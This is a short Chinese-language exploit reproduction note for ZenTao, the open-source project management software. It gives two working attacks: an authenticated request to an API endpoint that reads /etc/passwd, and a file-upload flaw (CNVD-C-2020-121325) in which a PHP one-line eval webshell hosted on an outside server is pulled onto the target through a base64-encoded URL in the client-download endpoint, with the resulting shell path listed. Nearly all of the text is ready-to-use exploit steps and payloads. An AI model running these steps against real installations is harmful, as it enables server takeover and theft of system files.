禅道
1.漏洞复现
后台任意文件读取
影响范围:禅道开源版 <= 11.6
登录后台,GET请求任意文件读取/zentao/api-getModel-file-parseCSV-fileName=/etc/passwd
CNVD-C-2020-121325 文件上传漏洞
影响范围:10.x < 禅道开源版 < 12.4.3
木马脚本放自己网站
<?php echo '<?php @eval($_POST[1]);?>';
HTTP://192.168.165.79/shell.php,HTTP大写、base64编码:SFRUUDovLzE5Mi4xNjguMTY1Ljc5L3NoZWxsLnBocA==
登录后台,GET请求,/zentao/client-download-1-SFRUUDovLzE5Mi4xNjguMTY1Ljc5L3NoZWxsLnBocA==.html
PHP一句话木马路径:/zentao/data/client/1/shell.php